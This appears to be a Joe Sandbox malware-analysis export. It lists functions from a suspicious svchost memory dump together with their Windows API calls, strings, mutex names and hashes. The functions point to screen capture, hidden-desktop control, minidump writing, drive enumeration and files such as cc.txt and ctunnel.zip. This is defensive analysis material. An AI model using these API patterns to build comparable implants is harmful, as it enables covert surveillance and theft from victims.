Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
String ID: 5C59047E$FAKTURA$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$\t
API String ID: 2736094147-1640954669
Opcode ID: d035cba7eba8a6acd806fadb93c7177c82aff2ecb4edb91411da6ee35cfacb9c
Instruction ID: ca385c3acf443d3381dd6adc31c0265cc181a9c35fd0710fe956a9c6b0026d93
Opcode Fuzzy Hash: d035cba7eba8a6acd806fadb93c7177c82aff2ecb4edb91411da6ee35cfacb9c
Instruction Fuzzy Hash: D721D336AC43153FF311AB60BC0AF5A73C49F54B65F548A04FE45A67C0DBF0AD048AA5

Function 02D03AE0 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 268threadCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(02D5D3A4,?), ref: 02D03BFD
PathAddBackslashA.SHLWAPI(02D5D3A4), ref: 02D03C33
PathAddBackslashA.SHLWAPI(02D5D3A4), ref: 02D03C67
PathAddBackslashA.SHLWAPI(02D5D3A4), ref: 02D03CE7

Part of subcall function 02D250A0: VirtualQuery.KERNEL32(02D250A0,?,0000001C), ref: 02D250C8

GetCurrentThreadId.KERNEL32 ref: 02D03D45
PathAddBackslashA.SHLWAPI(02D5D3A4), ref: 02D03D77
GetCurrentProcessId.KERNEL32(00000000,00000040,?,00000000,00000000), ref: 02D03DF8
GetCurrentProcess.KERNEL32(00000000), ref: 02D03DFF
MiniDumpWriteDump.DBGHELP(00000000), ref: 02D03E06
PathAddBackslashA.SHLWAPI(02D5D3A4), ref: 02D03E1A

Strings

scr.bmp, xrefs: 02D03D28
csm, xrefs: 02D03B05
DEBUG, xrefs: 02D03E1C
sysinfo.log, xrefs: 02D03CA8
\t, xrefs: 02D03BF2
minidump.bin, xrefs: 02D03DB8

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: BackslashPath$Current$DumpProcess$MiniQueryThreadVirtualWrite
String ID: DEBUG$csm$minidump.bin$scr.bmp$sysinfo.log$\t
API String ID: 2628503961-2701598188
Opcode ID: 9401c02db9a77b0f0950bd4f2b19648dea071f9b6a6f060d26de9adbaa2ac6ee
Instruction ID: 7def605bc4d7edcd735a1a3308a5b3b1405c1dcd71c8772218cb677f57d233e0
Opcode Fuzzy Hash: 9401c02db9a77b0f0950bd4f2b19648dea071f9b6a6f060d26de9adbaa2ac6ee
Instruction Fuzzy Hash: 969114306046598FDB28DF38A4E87EABBE2EF45304F6481D5D889DB3A0DB719D45CB90

Function 02D13140 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 97stringthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D13160
GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02D131A8
SetErrorMode.KERNEL32(00000001), ref: 02D131BE
GetCurrentThread.KERNEL32 ref: 02D131C6
SetThreadPriority.KERNEL32(00000000), ref: 02D131CD
lstrcpynA.KERNEL32(02D5DFC4,?,00000005), ref: 02D131EF
GetDriveTypeA.KERNEL32(02D5DFC4), ref: 02D131F6

Part of subcall function 02D13000: memset.MSVCRT ref: 02D13021
Part of subcall function 02D13000: GetDriveTypeA.KERNEL32(02D5DFC4,?,?,?), ref: 02D13038
Part of subcall function 02D13000: SetCurrentDirectoryA.KERNEL32(02D5DFC4,?,?,?), ref: 02D13048
Part of subcall function 02D13000: _snprintf.MSVCRT ref: 02D13075
Part of subcall function 02D13000: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02D13097
Part of subcall function 02D13000: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,75919300), ref: 02D130C1
Part of subcall function 02D13000: LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02D130D0
Part of subcall function 02D13000: WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 02D130E9
Part of subcall function 02D13000: UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02D130FA
Part of subcall function 02D13000: GetHandleInformation.KERNEL32(00000000,?), ref: 02D13117
Part of subcall function 02D13000: CloseHandle.KERNEL32(00000000), ref: 02D13128

lstrcpynA.KERNEL32(02D5DFC4,?,00000005), ref: 02D1323F
GetDriveTypeA.KERNEL32(02D5DFC4), ref: 02D13246

Strings

Console, xrefs: 02D1317B
AppEvents, xrefs: 02D13174, 02D13294, 02D132A0
Environment, xrefs: 02D13189
Software, xrefs: 02D13197
Control Panel, xrefs: 02D13182
Identities, xrefs: 02D13190
System, xrefs: 02D1319E

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: File$Drive$Type$CurrentHandleThreadlstrcpynmemset$CloseCreateDirectoryErrorInformationLockLogicalModePointerPriorityStringsUnlockWrite_snprintf
String ID: AppEvents$Console$Control Panel$Environment$Identities$Software$System
API String ID: 1338089429-328203234
Opcode ID: f3828a911763e826442fbfaaeaceffbc19794909db4054efda70012248c7fff2
Instruction ID: e98882e7a471e96028f95eb1727376150abef1463f507627dabacfe9d1414805
Opcode Fuzzy Hash: f3828a911763e826442fbfaaeaceffbc19794909db4054efda70012248c7fff2
Instruction Fuzzy Hash: 8C31B2B5E402A4AFDB20EF95B858BDF7BA5FB04708F904988E90596780C7B05E54CFA1

Function 02D220F0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 67sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D2211C
ReleaseMutex.KERNEL32(00000000), ref: 02D2212D
GetHandleInformation.KERNEL32(00000000,?), ref: 02D22141
CloseHandle.KERNEL32(00000000), ref: 02D2214F
CreateThread.KERNEL32(00000000,00000000,02D21FA0,00000000,00000000,00000000), ref: 02D22164
Sleep.KERNEL32(00009C40), ref: 02D22175
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2217A
GetHandleInformation.KERNEL32(00000000,?), ref: 02D2218E
CloseHandle.KERNEL32(00000000), ref: 02D2219C
PathAddBackslashA.SHLWAPI(5c59011e), ref: 02D221A7
Sleep.KERNEL32(00009C40,5c59011e,RAIFF), ref: 02D221C1
Sleep.KERNEL32(00000064), ref: 02D221CA

Strings

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D22110
\t, xrefs: 02D221A7
5c59011e, xrefs: 02D221A2, 02D221B2
RAIFF, xrefs: 02D221AD

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
String ID: 5c59011e$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$RAIFF$\t
API String ID: 505831200-3457321471
Opcode ID: 6b0c611d9edfda6c29efed485e12f44f59fb1b4a55c59e82ff20f9c650a1ef95
Instruction ID: 5c9d847fef26dbed810a9e80e36d0d93dc363807cee184f9b9d551d66c87174f
Opcode Fuzzy Hash: 6b0c611d9edfda6c29efed485e12f44f59fb1b4a55c59e82ff20f9c650a1ef95
Instruction Fuzzy Hash: 3211D3349C4731BBF3225BA0AC0EF1A3BD85F64B58F604904FE45A13C09BF0AD18C666

Function 02D1C978 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5C590552), ref: 02D1C997
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1C9D1
GetLastError.KERNEL32 ref: 02D1C9DB
IsUserAnAdmin.SHELL32 ref: 02D1C9E3
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1C9F4
SetLastError.KERNEL32(00000000), ref: 02D1C9FB
GetFileAttributesA.KERNEL32(?), ref: 02D1CA31
SetCurrentDirectoryA.KERNEL32(?), ref: 02D1CA70
PathAddBackslashA.SHLWAPI(5C590552,?,?), ref: 02D1CAB7

Strings

5C590552, xrefs: 02D1C992, 02D1C999, 02D1CAB2, 02D1CAB9
path_ctunnel.txt, xrefs: 02D1CAF8
ctunnel.zip, xrefs: 02D1CA10
\, xrefs: 02D1CA4F

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashDirectoryErrorLast$AdminAttributesCreateCurrentFileFolderMakeSystemUser
String ID: 5C590552$\$ctunnel.zip$path_ctunnel.txt
API String ID: 2545201083-319092976
Opcode ID: 0688f4470588706f2e3cfe525f125c2bf533da5e0c23cc443c320575e84b44f6
Instruction ID: 636e91d36ef5acd42a6b5d96e3a5e36048085d0605108695d5bfc27ceb8726d2
Opcode Fuzzy Hash: 0688f4470588706f2e3cfe525f125c2bf533da5e0c23cc443c320575e84b44f6
Instruction Fuzzy Hash: AF5128349882599FCB16CF24E868BE67BE4EF59300F1485D6D8CAC7341DB709D88CB51

Function 02D080A0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 156synchronizationmemorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02D080BC
GetThreadDesktop.USER32(00000000,?,?,02D07F92,00000000,00000000), ref: 02D080C3
SetThreadDesktop.USER32(00000000,?,?,02D07F92,00000000,00000000), ref: 02D080CF

Part of subcall function 02D0D850: GetTickCount.KERNEL32 ref: 02D0D858
Part of subcall function 02D0D850: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D869
Part of subcall function 02D0D850: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02D4F5A0), ref: 02D0D893
Part of subcall function 02D0D850: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D8AC
Part of subcall function 02D0D850: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02D4F54C), ref: 02D0D8D9
Part of subcall function 02D0D850: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D8EC
Part of subcall function 02D0D850: CreateMutexA.KERNEL32(00000000,00000000,02D4F670,?,?,02D07F92,00000000,00000000), ref: 02D0D90A
Part of subcall function 02D0D850: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D91B
Part of subcall function 02D0D850: CreateMutexA.KERNEL32(00000000,00000000,02D4F630,?,?,02D07F92,00000000,00000000), ref: 02D0D92F
Part of subcall function 02D0D850: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D948
Part of subcall function 02D0D850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D95B
Part of subcall function 02D0D850: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02D07F92,00000000,00000000), ref: 02D0D96E

Part of subcall function 02D0D9A0: memset.MSVCRT ref: 02D0D9B9
Part of subcall function 02D0D9A0: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02D0D9D2

Part of subcall function 02D29AA0: malloc.MSVCRT ref: 02D29AB2

HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02D08167
HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02D08175
lstrcpyA.KERNEL32(00000000,fuck), ref: 02D0817F

Part of subcall function 02D14AF0: IsNetworkAlive.SENSAPI(02D06BEE,00000000), ref: 02D14B03
Part of subcall function 02D14AF0: IsUserAnAdmin.SHELL32 ref: 02D14B11
Part of subcall function 02D14AF0: DnsFlushResolverCache.DNSAPI ref: 02D14B1B
Part of subcall function 02D14AF0: memset.MSVCRT ref: 02D14B38
Part of subcall function 02D14AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,75920F10), ref: 02D14B57
Part of subcall function 02D14AF0: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02D14B70
Part of subcall function 02D14AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D14B83
Part of subcall function 02D14AF0: memset.MSVCRT ref: 02D14B9C
Part of subcall function 02D14AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,75920F10), ref: 02D14BB5
Part of subcall function 02D14AF0: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02D14BC8
Part of subcall function 02D14AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D14BD5

WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02D08222
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02D08231
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02D08260
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D0826F
ReleaseMutex.KERNEL32(00000000), ref: 02D0827D
SetEvent.KERNEL32(00000000), ref: 02D08286
Sleep.KERNEL32(00002710,?,00000000), ref: 02D082CC

Strings

fuck, xrefs: 02D08177
SYSTEM!216041!38425AAC, xrefs: 02D08106

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Create$EventFileMutexObjectSingleWait$HeapThreadmemset$AllocCheckConnectionDesktopInternetMappingViewlstrcpyn$AdminAliveCacheCountCurrentFlushNetworkReleaseResolverSleepTickUserVersionlstrcpymalloc
String ID: SYSTEM!216041!38425AAC$fuck
API String ID: 2939156510-229730093
Opcode ID: e251c44c12577d7eeebe6e659ece88286f6c16a49c9594d7060411a554962d76
Instruction ID: 83ba4fb801656b18c81f76b825eff38ced17120e1d18fe6f4f0dddcb26f0549b
Opcode Fuzzy Hash: e251c44c12577d7eeebe6e659ece88286f6c16a49c9594d7060411a554962d76
Instruction Fuzzy Hash: 55518079941340AFD7149F64E988FA63BE5FB49314F158AA9E9448B3E1C770AC14CF60

Function 02D1E080 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5c5905a8), ref: 02D1E0B0
PathAddBackslashA.SHLWAPI(5c5905a8), ref: 02D1E0ED
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1E102
GetLastError.KERNEL32 ref: 02D1E10C
IsUserAnAdmin.SHELL32 ref: 02D1E114
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1E125
SetLastError.KERNEL32(00000000), ref: 02D1E12C
SetCurrentDirectoryA.KERNEL32(?), ref: 02D1E139
PathAddBackslashA.SHLWAPI(5c5905a8,?,?), ref: 02D1E161
GetProcessHeap.KERNEL32(00000000,?,5c5905a8,02D4A2A8), ref: 02D1E17F
HeapValidate.KERNEL32(00000000), ref: 02D1E182
GetProcessHeap.KERNEL32(00000000,?), ref: 02D1E18F
HeapFree.KERNEL32(00000000), ref: 02D1E192

Strings

5c5905a8, xrefs: 02D1E0AB, 02D1E0B2, 02D1E0E6, 02D1E0EF, 02D1E15C, 02D1E168
cc.txt, xrefs: 02D1E152

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HeapPath$Backslash$DirectoryErrorLastProcess$AdminCreateCurrentFolderFreeMakeSystemUserValidate
String ID: 5c5905a8$cc.txt
API String ID: 2491352018-948045845
Opcode ID: 3c653ba0e1b9cc846371a6a2b1ca234e1e517abde97f567c839f71b200a8be6e
Instruction ID: 062e0a53f53b3975fc3ae55abe3e75261968e17cee60b08fe7d213b8d3673cd6
Opcode Fuzzy Hash: 3c653ba0e1b9cc846371a6a2b1ca234e1e517abde97f567c839f71b200a8be6e
Instruction Fuzzy Hash: F231F135A40319BBEB20AB74BC58BAB7B98EF55B01F504950FD86C7300DAB09C84C7A0

Function 02D230B0 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 67sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02D230DC
ReleaseMutex.KERNEL32(00000000), ref: 02D230ED
GetHandleInformation.KERNEL32(00000000,?), ref: 02D23101
CloseHandle.KERNEL32(00000000), ref: 02D2310F
CreateThread.KERNEL32(00000000,00000000,02D22F60,00000000,00000000,00000000), ref: 02D23124
Sleep.KERNEL32(00009C40), ref: 02D23135
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2313A
GetHandleInformation.KERNEL32(00000000,?), ref: 02D2314E
CloseHandle.KERNEL32(00000000), ref: 02D2315C
PathAddBackslashA.SHLWAPI(02D5CF94), ref: 02D23167
Sleep.KERNEL32(00009C40,02D5CF94,RSTYLE), ref: 02D23181
Sleep.KERNEL32(00000064), ref: 02D2318A

Strings

RSTYLE, xrefs: 02D2316D
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}, xrefs: 02D230D0
\t, xrefs: 02D23167

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
String ID: Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$RSTYLE$\t
API String ID: 505831200-280280100
Opcode ID: 6885be637882f9acda6a7e5ddd82c913ae56664f6e615ade5fbd91dcdeb9d538
Instruction ID: f7a50f0aa19bead7ff82c3dbb5ed587c95b50bc2cff7105b9f70e27cde4b3519
Opcode Fuzzy Hash: 6885be637882f9acda6a7e5ddd82c913ae56664f6e615ade5fbd91dcdeb9d538
Instruction Fuzzy Hash: 02112234AC43367BF2215BA0AC0EF1A37D89F60B18F204504F946613C09BF4AC18CBBA

Function 02D22108 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D2211C
ReleaseMutex.KERNEL32(00000000), ref: 02D2212D
GetHandleInformation.KERNEL32(00000000,?), ref: 02D22141
CloseHandle.KERNEL32(00000000), ref: 02D2214F
CreateThread.KERNEL32(00000000,00000000,02D21FA0,00000000,00000000,00000000), ref: 02D22164
Sleep.KERNEL32(00009C40), ref: 02D22175
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2217A
GetHandleInformation.KERNEL32(00000000,?), ref: 02D2218E
CloseHandle.KERNEL32(00000000), ref: 02D2219C
PathAddBackslashA.SHLWAPI(5c59011e), ref: 02D221A7
Sleep.KERNEL32(00009C40,5c59011e,RAIFF), ref: 02D221C1
Sleep.KERNEL32(00000064), ref: 02D221CA

Strings

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D22110
\t, xrefs: 02D221A7
5c59011e, xrefs: 02D221A2, 02D221B2
RAIFF, xrefs: 02D221AD

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
String ID: 5c59011e$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$RAIFF$\t
API String ID: 505831200-3457321471
Opcode ID: eaa1d4b24b68d6870796b64b33e3b72e5f3bf93fd22e11fab155596350e6ca79
Instruction ID: ef40457735ec8d1a78c88dec69bb66ffa0b54246d56096060c52a40e42bc642b
Opcode Fuzzy Hash: eaa1d4b24b68d6870796b64b33e3b72e5f3bf93fd22e11fab155596350e6ca79
Instruction Fuzzy Hash: A511A034AC4331BBF3225B60AC1EF1A3BD45F64B59F608904FE45A13C08BF09C18CA66

Function 02D0A000 Relevance: 25.9, APIs: 17, Instructions: 354windowthreadtimeCOMMON

Download Yara Rule

APIs

GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02D0A00E

Part of subcall function 02D0DFB0: GetWindowLongA.USER32(75A8BCB0,000000F0), ref: 02D0DFCB
Part of subcall function 02D0DFB0: GetLastActivePopup.USER32(75A8BCB0), ref: 02D0DFD9
Part of subcall function 02D0DFB0: GetWindow.USER32(00000000,00000005), ref: 02D0DFF3
Part of subcall function 02D0DFB0: GetWindow.USER32(00000000), ref: 02D0DFF6
Part of subcall function 02D0DFB0: GetWindowInfo.USER32(00000000,?), ref: 02D0E00C
Part of subcall function 02D0DFB0: GetWindow.USER32(00000000,00000004), ref: 02D0E015
Part of subcall function 02D0DFB0: GetWindow.USER32(00000000,00000003), ref: 02D0E04E

SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02D0A04F
GetAncestor.USER32(00000000,00000002,00000000), ref: 02D0A0D5
SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02D0A0FC
PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02D0A141
PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02D0A195

Part of subcall function 02D09EB0: GetTickCount.KERNEL32 ref: 02D09F3A
Part of subcall function 02D09EB0: GetClassLongA.USER32(00000000,000000E6), ref: 02D09F8D

PostMessageA.USER32(00000000,00000112,?,?), ref: 02D0A1FE
PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02D0A229
PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02D0A2A5
GetSystemMenu.USER32(00000000,00000000), ref: 02D0A2C4
GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02D0A2E8
GetWindowThreadProcessId.USER32(?,00000000), ref: 02D0A353
PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02D0A366
PostMessageA.USER32(?,?,00000001,00000000), ref: 02D0A389
PostMessageA.USER32(?,?,00000002,00000000), ref: 02D0A3AB
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02D0A3E3
GetWindowThreadProcessId.USER32(?,00000000), ref: 02D0A40D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
String ID:
API String ID: 590198697-0
Opcode ID: 13fceb958e721a8680931750743445770cf81f8c56ff1d03c1159b985e38881f
Instruction ID: f381be683877361d5e3d76a864ce012fd081f9d6530536a4f98a3e9ad16b7817
Opcode Fuzzy Hash: 13fceb958e721a8680931750743445770cf81f8c56ff1d03c1159b985e38881f
Instruction Fuzzy Hash: 6BB14436E4031867EB209E68E8C4FBE73A8D745715F60813AFA459B3E2C7658C51C7A2

Function 02D09050 Relevance: 25.6, APIs: 17, Instructions: 96windowsynchronizationsleepCOMMON

Download Yara Rule

APIs

SetThreadDesktop.USER32(?), ref: 02D09062

Part of subcall function 02D08C30: SelectObject.GDI32(00000000,00000000), ref: 02D08C4A
Part of subcall function 02D08C30: DeleteObject.GDI32(00000000), ref: 02D08C59
Part of subcall function 02D08C30: DeleteDC.GDI32(00000000), ref: 02D08C67
Part of subcall function 02D08C30: SelectObject.GDI32(?,00000000), ref: 02D08C77
Part of subcall function 02D08C30: DeleteObject.GDI32(00000000), ref: 02D08C7F
Part of subcall function 02D08C30: DeleteDC.GDI32(?), ref: 02D08C88
Part of subcall function 02D08C30: GetDC.USER32(00000000), ref: 02D08C8C
Part of subcall function 02D08C30: CreateCompatibleDC.GDI32(00000000), ref: 02D08C9B
Part of subcall function 02D08C30: CreateCompatibleDC.GDI32(00000000), ref: 02D08CA3
Part of subcall function 02D08C30: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02D08CC4
Part of subcall function 02D08C30: SelectObject.GDI32(?,00000000), ref: 02D08CD3
Part of subcall function 02D08C30: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02D08CEE
Part of subcall function 02D08C30: SelectObject.GDI32(00000000,00000000), ref: 02D08D0D
Part of subcall function 02D08C30: ReleaseDC.USER32(00000000,00000000), ref: 02D08D1C

WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02D0907F
GetTopWindow.USER32(00000000), ref: 02D09092
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D090A9
GetWindow.USER32(00000000,00000005), ref: 02D090C9
GetWindow.USER32(00000000), ref: 02D090CC
WindowFromPoint.USER32(?,?,00000000), ref: 02D090E0
SendMessageA.USER32(00000000,?,00000005,00000000), ref: 02D09103
GetIconInfo.USER32(?,?), ref: 02D0910B
DeleteObject.GDI32(?), ref: 02D09116
DeleteObject.GDI32(?), ref: 02D09121
DrawIcon.USER32(00000000,00000000,?,?), ref: 02D09143
DestroyIcon.USER32(?,?,?,00000000), ref: 02D0914A
SendMessageA.USER32(00000000,?,00000005,?), ref: 02D0915B
ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 02D09163
SetEvent.KERNEL32(00000000,?,?,00000000), ref: 02D09170
Sleep.KERNEL32(00000032), ref: 02D0917D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Object$Delete$CompatibleCreateSelectWindow$Icon$BitmapMessageReleaseSendSingleWait$DesktopDestroyDrawEventFromInfoMutexPointSleepThread
String ID:
API String ID: 1852974301-0
Opcode ID: 0402d567b5178d1a7ada7a4c9ac019ed76a6e36e38132ec547acea4ad88139e0
Instruction ID: 4e078fc62ee178ba4efb2556bb827b41990037d2e0698e540262b621f21e7bca
Opcode Fuzzy Hash: 0402d567b5178d1a7ada7a4c9ac019ed76a6e36e38132ec547acea4ad88139e0
Instruction Fuzzy Hash: 84312A7DA80301AFD210DF64E88CE6B77F9EB98B15B508A08B90587391DB70EC21CF61

Function 02D192D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,7591F550,7591DF10,02D1549B), ref: 02D192E1
GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02D192F3

